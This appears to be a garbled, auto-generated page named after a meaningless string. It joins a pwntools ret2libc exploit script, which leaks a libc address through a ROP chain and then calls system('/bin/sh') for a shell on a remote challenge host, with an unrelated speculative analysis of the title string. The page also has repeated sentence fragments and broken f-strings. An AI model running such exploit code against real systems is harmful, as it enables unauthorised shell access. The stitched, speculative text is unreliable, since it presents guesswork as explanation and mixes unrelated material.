Lslandissue06littlepirateslsp007 File
#!/usr/bin/env python3
from pwn import *
binary = './lsp007'
elf = ELF(binary)
libc = ELF('/usr/lib/x86_64-linux-gnu/libc.so.6') # or the libc used on the remote host
context.binary = elf
context.terminal = ['tmux', 'splitw', '-h']
def start():
if args.REMOTE:
return remote('pwn.chal.island', 31337)
else:
return process(binary)
p = start()
# ----------------------------------------------------------------------
# 1️⃣ Stage 1 – Leak puts address
# ----------------------------------------------------------------------
pop_rdi = elf.address + 0x125b # pop rdi ; ret
ret = elf.address + 0x124a # ret (for alignment)
plt_puts = elf.plt['puts']
got_puts = elf.got['puts']
main = elf.sym['main']
payload = flat(
b'A' * 0x48,
pop_rdi,
got_puts,
plt_puts,
main
)
p.sendlineafter(b'What do you want to say?', payload)
# receive the leaked puts address
leak = p.recvline().strip()
leaked_puts = u64(leak.ljust(8, b'\x00'))
log.success(f'Leaked puts@GLIBC: hex(leaked_puts)')
# ----------------------------------------------------------------------
# 2️⃣ Compute libc base and required symbols
# ----------------------------------------------------------------------
libc_base = leaked_puts - libc.symbols['puts']
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))
log.info(f'libc base : hex(libc_base)')
log.info(f'system : hex(system)')
log.info(f'/bin/sh : hex(binsh)')
# ----------------------------------------------------------------------
# 3️⃣ Stage 2 – Call system("/bin/sh")
# ----------------------------------------------------------------------
payload2 = flat(
b'A' * 0x48,
pop_rdi,
binsh,
ret,
system
)
p.sendlineafter(b'What do you want to say?', payload2)
# give us an interactive shell
p.interactive()
Explanation of the script
Because the binary is PIE, we must compute the runtime base after the first stage leak. lslandissue06littlepirateslsp007
Some webcomic series tag their backend assets with codes. lsland could be a misspelled "Island" — a comics series named "L.S. Island" (e.g., "Lone Star Island"). Issue #6 focuses on little pirates. The lsp007 might be a creator’s internal page or panel counter. Explanation of the script
Quality assurance teams generate random-looking strings for stress tests or placeholder data. lslandissue06littlepirateslsp007 could be: Because the binary is PIE, we must compute
Let’s break lslandissue06littlepirateslsp007 into logical segments:
| Segment | Likely Meaning |
|---------|----------------|
| lsland | Probable typo or obfuscation of "Island" (missing 'I' case? lsland vs island). Could also be an acronym: L-S-LAND. |
| issue06 | Issue #6 — suggests a comic, magazine, patch notes, or build release. |
| littlepirates | Central theme: child pirates, miniature pirate characters, or a game/mission name. |
| lsp007 | LSP = "Little Pirates" (repeated), or "Lazy Script Protocol", "Laser Signal Processor". 007 = James Bond reference (spy theme), or simply build #7. |
The string lacks standard separators (underscores, hyphens), implying it might be a concatenated key for internal lookup rather than a user-facing name.